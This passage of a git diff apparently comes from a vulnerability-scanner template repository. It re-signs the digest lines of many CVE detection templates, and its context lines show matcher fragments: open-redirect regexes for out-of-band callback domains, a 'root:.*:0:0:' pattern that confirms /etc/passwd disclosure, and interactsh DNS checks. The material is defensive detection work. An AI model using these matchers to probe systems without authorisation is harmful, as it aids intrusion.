4a0a00473045022100ecc02e14e699cb2527c3ced6d5491e5c900a65de2dfa04098e53be87b1d38f360220425fbf0adbafce13c5c0c2558453f0d6dd81dbad1eb256caa6ce304281b74633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 9f508251d1..4665d7d733 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' -# digest: 4a0a00473045022076e656e11cb00070c5a59a08ecaad48f28beabbdfe91944e5eb2a824ca06d899022100fbd1daa4c3844c157f8a9bea25711e36c07267fe37ab3ea314e233bc14f0ea8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adf80dbae3063d1c8914173cf09b200f59b74231ab14a65f5cbe8bc6bb04c4f5022100c7054098ab7e244fd8edc9b92ff8a67ed416ba75b114d45c2d275b1ac7e7e359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index 059474be63..2f8d4d5226 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -99,4 +99,4 @@ http: regex: - '\/workspace\/([0-9]+)\?scriptNonce=' internal: true -# digest: 490a0046304402206ef468fce96e52210ef42ebedc016c173ff1a4381437ae9e2a655261988f671d022077243b6d2ccb046199a4b226cd7d97dff9dd6a24578ac0cca33657a26c70ad63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a1252c91302fdb2e415894f2edb3ce9ddca2782343db2834dafd615c2f2ccd0022100ff34726baa2c011bbb80010f936f106079be1d9b91b57e064f5408d8ce7432b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml index 7a1fd69f82..ff1e8c9e4e 100644 --- a/http/cves/2023/CVE-2023-5830.yaml +++ b/http/cves/2023/CVE-2023-5830.yaml @@ -62,4 +62,4 @@ http: part: body words: - '"Authorized":false' -# digest: 4a0a00473045022100e96e3f0489d007a9f47fac7ecf08b3760876b4ebe8ef9c9dd87c547303c2c9e5022073cd8996d518b5055d0c7e2c678f6e6f859a6ea0738f651b4389e54edf538ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db35b1cbbaf04fd779f6cba94aa775c094313d177ffd35c9020614d6d4d3ede02206aafe4e7ec826b62c6e7875a4f4269ea537ddb79dc6f2d0f10455a8bb6f68b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5914.yaml b/http/cves/2023/CVE-2023-5914.yaml index 4ef598c820..4d4d1b6635 100644 --- a/http/cves/2023/CVE-2023-5914.yaml +++ b/http/cves/2023/CVE-2023-5914.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "XmlException")' condition: and -# digest: 4a0a00473045022100ddcc759c821d79ce4ed8806039b80715c20472a8dbffa3eab8eaa215ff25dfc3022017cdae9fbe0dcdb9504238d98a1adc34fa3b73af7cd7cfee711288bdfef500cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100836c3a82e583dab53376372e8a4feec400f23f27175cdb8186220a18dfcc10bb022061f0bedf50d474d78c825b26a4d6ed0aaf62471723614d3384831b81ee991d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 5fd55b51f8..56f289ea71 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e48798224d0152e1a3c25a11bb3f155c73b506b3f11b3a1266d80e9ddbe0add902205800bd65f60db5f4230f7efad32427f34e33704e3b2d36d8eba55a388719c0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 2a4d6687e3..817af599cd 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -69,4 +69,4 @@ http: - '"registered_model":' - '"name":' condition: and -# digest: 490a00463044022052f02e7aa3838fce1739f32e8a1da643d5788b48a35c72d756224d83d73c79000220410b9ebbb1498060027b19a08cd6f423607efad2d28b3c23a5d7b2acbf2e8bea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202237b7d220fa9ba25938a5845cd7900b8a99339e3f8c0749d5eeb66fd267490102204422bcbe402037b1c99ca0738680b4fb2c61ccdd7a90f6323ad564ff9d5f8e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index 9951ee6eab..5fe2b87858 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100deec5c973c35fa67721362401e0c2701d6dd8f7d163f5d156b154fe42f891b3f02206a9d4410ff07e2f051d593e77b96f6cdcc79cd0a4e279c64e15e1db1c14ffe5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064e5166ee6da2fdd8be79992992583caec156121337bf89b14ff004331bb6d8802201016dfbf0e39ae095c915d876b1b57c3186997a91cd28c03f040fa60ca413647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 0323e7dc80..dbd612b0df 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -57,4 +57,4 @@ http: name: nodeid json: - '..|objects|.nodeId//empty[0]' -# digest: 4a0a00473045022100d4fbb382aa5dd26c05c8591f16e5c16ad8d41d3f0fc6b9960483f53288f6a1c402200ba9fd061ec61c3494888eb5dff978330e66c815347dffeb9d82acea7081967f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ceb1c44419fd44d0fa0a922fda30289e5d241940f61e7d18e23a56936d96db4f0220347ff010c1aba9d8ec613cae89ee2adb75c775e23daece9d2186d9c06e04892f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6023.yaml b/http/cves/2023/CVE-2023-6023.yaml index d1cde882d8..25aacd650a 100644 --- a/http/cves/2023/CVE-2023-6023.yaml +++ b/http/cves/2023/CVE-2023-6023.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220413ca98f296d85576af9dee2201bfc9588c0bfca659b1ed6604fd9b576a2be8202203a19defaa8d6fb92815290ba857c5e6489376eac541531ed518bab9f2ff122f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072f52b5c63da178f6fff73e03d9f0a370f6d1645f293f20fb73482cd8fa6f2ba02204502955488ad9950bc0a63a1a35fb3874dfce19ec8a5e8371cb8a8d0adb66fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index d2d3ca90d1..0fd863efdd 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -49,4 +49,4 @@ http: - "regex('root:.*:0:0:', body_2)" - "status_code_2 == 200" condition: and -# digest: 4a0a00473045022100d23a99051d0ca3c7ed9f00df5f9dff40fc14d7bbfe4a1a21e9996fe7df89f8cb02203a1b3dbd2ab774f9296aada9f5de5d759852382066531edbe9b558c90f0e5322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206dbfed0c28b3e21350071492bcee839d9d7082a7a9d67b625426821601cf19e202205a45e1db6cb7610dfd89b63c1b98039b6c0ccf2647f9912078214cb374228410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 7bf2365ff1..a2a2062207 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -58,4 +58,4 @@ http: - 'status_code == 200' - 'contains(body, "wp-admin")' condition: and -# digest: 4b0a00483046022100f7bbc27951654dbca3bdf6a948dc356043e28efc07a03645748cfa66dbbb3300022100fe0227a802728849ed9f0a716c13e735cf9a337470c06bfc6ce3fd9ed0f4da77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034e6469fb175abf5f0ead5f467b0674899bfb4a1776a6188e97231cabcc92e7202206b25fdfb241ed91d4cee2ee05e8f798bd0bd1b0fcf6ece85993f972f331d224f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 58107cd62a..554727c555 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d57bed9f86a5c3790fab7c7ad97d0ce2a40a3769cadf8c03db9fe296816f3dc022100a72b53af19a2d49d7d48f413a62219b54ef121d6c17aa1c35758f4608f69b95f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc29a717cad3f1cee3289a56267f95133718b5524f83746d1cbe95c529f4a15d022048929c54cdc6f093d8ed3c634a2946ca4874f463759bb3ab0eb1e9df35d6e8cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index 3eb7868174..f0103e009d 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -41,4 +41,4 @@ http: - "status_code == 200" - "contains(body, '/tmp') && contains(body, 'Index of')" condition: and -# digest: 4b0a00483046022100eabf9219dc9e6989598a1e706ef63cba43186ef9f0414058760b4d431972d3b802210095d09270e8945a8668e0078e71b8b8acecd04475963e29c6561245d80492846f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022eea8235ae8015d6909cf70399d1ab466220b6ae36c3511acbb7bd3f01a463e02201e9729a0db2a9791ef37a4cc37b8219c806799e6669590f6c6149a82bb945a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index 300106a47f..c823d8f680 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -55,4 +55,4 @@ http: - 'contains(body, "[]")' - 'duration >= 6' condition: and -# digest: 4a0a0047304502203abe044d78eb44235d24bb992c374dfd703651411e9f993f6bd4b985c6f0348d022100be46793ecec88a8ebc27e0c913ce775aa35f2697071e4d5dede66a0a59ed24b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce08a03a6aa1582532acf62f661ce5ce40afe812793118799951d4ae125d469c022100cf3856bae89445b456a8d94318817eaae079b9ab399cea89ff899639ac47e1c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index 99d03e0b53..7660993cd5 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b71db177da91e5e6c5e897488cbdc0d42d62cd5a08eb0cf9118b75c657302b5d02201e724c6dc9389e19b0e1e7f1c0ef4302a6331009f3fc4ed69d27c5d4c6fef93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e05cf7f2f91cf532ffb6f807d60642917e9e6ec9d822a2e54cd2de74ae45ce3022034c3befcd7ef45e90974eca3405e19fa64eb34794b94d3229602d8f3c80e20b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 6f23bea096..3bd9c533af 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100a5a608b89ffe743993de0f02706ecec163b8896eedd5eddc7760c0b04d5ab0ab02207aceb79637f8deb9884da67bcb4a0670206654de1aa6dac32dc892f0f28d2309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8f67cf5ced5325f71a7df26c1365c6ef6de0e5bff9fb8bc27c5772ec9678ccb02202cc859db371c7dfd3a38c6266aeec5b8460678e5a0bc08479f333dca7163c770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 917e147152..cec769be7b 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022069291b94181425caa4ab6312081887206d9106911c86385cb93dacc297d0b7fb022078696dd4ed775e8b5a8d9e5e93907812fd5645362152da68ae7aa6bcd89bf8a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index ebae9ddafd..96dc4246a7 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -57,4 +57,4 @@ http: - 'status_code == 200' - '!contains(body, "Incorrect parameters")' condition: and -# digest: 4b0a00483046022100ddebbe709631857b161d91f48fcaad3cbcbcf64ac268f381b2fb06b62d443ca6022100978d207450ff4e3b1354ed0c4bd55f7f0618aeeac8be603ccce61db984c0e2cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220661c2d0bbd520881687d882ec68392a1b4550061945919523c2edcd6422ed8a702203bdd67f2fe7b6bca62f3608e55342cd081f8ac2dc9d4a54ceb5d82b40d267e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index 5a9ad442ae..df8efb7dc9 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -44,4 +44,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 4a0a0047304502210085b3b5a77e87f606925cb203290c351bfd67682723d02555577f4197749a33d002203afee6ee56b4b406278f2cecc726ba148b39886cff4d5476eb0cc3775c15b319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049bde3d0466108b9b6bedde41f7b02672e5105dc2715b1e47e00050d940308960220202e7919355ec36aa5f1df03661c9e36bfd63b962ba0df1e1f749ae5b6e5bdea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index f8a50523ce..5617af765f 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -46,4 +46,4 @@ http: - "regex('root:.*:0:0:', body_1)" - 'contains(body_2, "Essential Blocks – Page")' condition: and -# digest: 4a0a0047304502207d8c7609094a1fcc45e09dc8ebe35c75ac8395a88ae445e167670d8170179e66022100d155f3979980076224bb71384247a853423ac98c0fe216581f8f55343ee217a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074608b993f54ad1c4a650efb6e94f7060a6eb7bbcb1b6a06d126af9f727eece302203c483f813b2de38dde9f6f4de6ae15eaaa6e18e056c051c0db9822342f974444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 3ca99e2e70..39f79c8112 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -60,4 +60,4 @@ http: - "contains(body_1, '<pre>{{randstr}}</pre>') " - "status_code == 200" condition: and -# digest: 4a0a00473045022100c9994c66149f4a5bf4f57eb82447c380b3f1676950538da499834183bc73a10d022003e36af3fb7e71968c37a7a3cbde7b2fd89d97f0bc0dd4827b652838616db3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fefee7738d7318b2a23319053598eb449feae8f7895068cc68e9024beb9349000220243e0e60f28515bca8e3f6574da036d920079e1edb28c9d922532c4ffe2dec33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index c61efb18c2..34b6072580 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220562372b84037c253793b1361644b96eee1ccba93418d5cd737d3aaa998b804ec0221008a4a73e79fa7039b979a9897d901eef7dc19a6503ac32ff803a078f3c61485f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ddb723e7f69860d46bf9f0d3eb35ef2480886f01c5ca13e1a0d8575549d5120022100bd216b56f72cce7e547ed8ebf3dcbd2e3ec8ae994eccca17465f3315741f4e29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 112b394224..d12431188f 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -66,4 +66,4 @@ http: - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")' - 'contains_all(body_3, "true,\"data\":", "access_token=")' condition: and -# digest: 4a0a00473045022100df1311e0648c5c0c2297cad9b5527b9c111d611cf4b9f990fdea564c1ff5c4cc02202ce1f58dc34dd57604eef2926b33b969069290c0f03ffabb7af0be0f90fea60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054ee2def0b29dd215b74e42c2b2fae960ec0297d5d2e8218b287ca21b198810802200d71bf6828498c33e1b0e6e7dfd452c17b144bffdb1857b383b8a82ff70521b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index d235fb2d48..30725264c4 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5522ab583b393cf6a360b2e58dae29b4681cb2fefa1f6ad38518b6dc74c829c022013094391177663822a780dcd082911844f772129caea17c943068a4037e24e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100873e667f79525849dce90cee9fef344f9cede1e176a67b4f6918f37d4a23e3b50220576cab131b3b6fe4305ffc0a3f677aeb1778b20ed6ea7df960fabb089bdedafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index 0a9d5b0090..f54123a4f1 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -96,4 +96,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 490a00463044022062e417739d10a0345e088ba046630f61c75a6fb7c2640786cae6d7fe70c113da0220798d1ffc7b82d974779f27319ed421eb30bafdb7d6a1dbc125edc69436bef5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052a30b6e907e294f038966261bdad72af7c17267badac02e788613b04753c2b1022066fc365a76fb0d47be05eaa43ae50f697ff46da97e01b7164ee6a67634a8f687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index ad82399438..5d6745fa14 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205c8c97c275094e88344019f80ab5824b9d657171e092d085f48ff32a61c3bcf2022100e3ee293e0e93fe88e0838ff2ab71274a68e6cd4ffdf9bc9f50e58b9bd30a4b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0cc21ee7674483fa248cd37db375771b19a1d3946c54b714fe83507f3165b8d02200428fde4d64af3695a299151160bf01a3519aca37aef9bf090b6e554b0ae1bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 802578849e..eae3fd1da0 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093c24d2fd1ae8419c9e8f9fd7a52f96cdd206a4cb9b12d3609925dc966ccccef022100e0ab5dea2fb436d6b86f9d3ab834a6191b1420a549be6df84c7658dde0c24928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 80f92e14eb..4482533320 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -73,4 +73,4 @@ http: - type: dsl dsl: - username -# digest: 4a0a004730450220463aa8f8060e3d37f8935e48c8c505f27a93a54e94298dfab55d23119670cb3c022100949c049141cf1a84318d7a48bddd617e314733ec8e6cabf27b140c8396816d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c8b9f3dd68d958f6e7fef77b3e41a0503d0ce5dbd5938e48b6aa5673740deb6022100a73edc9d9b3abab28c28d668940b630a29f8ab22eb57fc837c0a199d11949d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 07766fd74e..33b6f5b735 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -55,4 +55,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a004730450220745e8b365ef39550953f2e7c7ec479c97d618b53aca81aa2b4ca13122a21393e022100ca3f258bebf53fbde78835764d0418a8e96537a8c81731da03b8ef7429d65e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220224fd0c2d3e7a5a8a342a552978cab6e0c092e96e5051acbcbc188195ddbaf79022100e343e64a1df88675ddee620ae422551478db8fb0bd0717f599875461b3674f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index c4ccc716c1..b2fa1f6f6a 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -140,4 +140,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202af9825ce4c628dd737cd0ccc55a5e21eacfe2fe5bfd7774cd9beb496823ff1902200709cad5ee85816fd669fb420ec1ad81f9fc45674917637775df828d1d3c24c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index e115c0cad5..3df53ddbe7 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220581efe02eb9cd3ada112546fde3dc7479baecfc944f62b46161092c26a8ea386022100938435bdc92e8db29976fbb000eb51a136a70541574c87c832a83b2b1f87ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb7b55a7105c762dc0cfc768f943c35b9f8e8dd12e835bdf1d02a7dad92f19ce022100f3f3f81a40d97c815e7fd00dbf28682b4b29f358abbc6ef73a1cd30ae198a26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 9cc96e8257..5babf693a2 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203776f70607308dc5842148f721807cddd437743f37d42520d8d3d7507ccb14fe0221008718d14a88f39edcfc1dc90a1b399da2330eb4d026aba06ae521a1be3ef07338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index bc5222aad8..1a1258ea1b 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022015e3b88f751e5eecf33a42035bdf0113bdc40dab4f2bb7b7585a58b07a2a3f8c02205a2cf5822cfe9758202ab4fc426fb99e6e702ab31c6ebd5c14e720ae82d26a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1f25d83c4cc8faf1fb67b3d457d7836d489e5d39a804474ab40d527613a1cf402206d8825a981c77b5dbd4b1e8b46aa5223cdc770f4699c9593bf2abfae8875d691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index 285109fd1a..639c6a0675 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ b/http/cves/2024/CVE-2024-0337.yaml @@ -31,4 +31,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100b62074d8f68fb2cd5bca314322a65516a6df198a8b84351098fe13babf2af5680220740b91fd3dc325e68c28496b76f1c373dc916628237e0245cf337f693ca65fb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220181582ac93b72f27e977d2061f18ff05e3b5df811283cea693e6f70459ab7fb90221008a49810c8b6636aaef8a8678a28ed5d5204efe8af7cdfd25e42fee1f0617dea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 32c906a6af..b9f84832b2 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -62,4 +62,4 @@ http: part: body json: - ".data.url" -# digest: 4a0a00473045022100be04b8cac16a0577f0fc6b0022cf4994579f8d883c303f66f39ab4955412da3f02204f210d0cd8ce3c68975bcbc6d030680d926478b27dbc1781c253f4e0835ca650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f918936fafffcf93421ce086207f2283925cd669ecc632d7ed2bc75094b855a802200fd6828f58d3fe1ed11a252d611b4b5a317e232fcc89bb3d80c103e17ea3ac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml 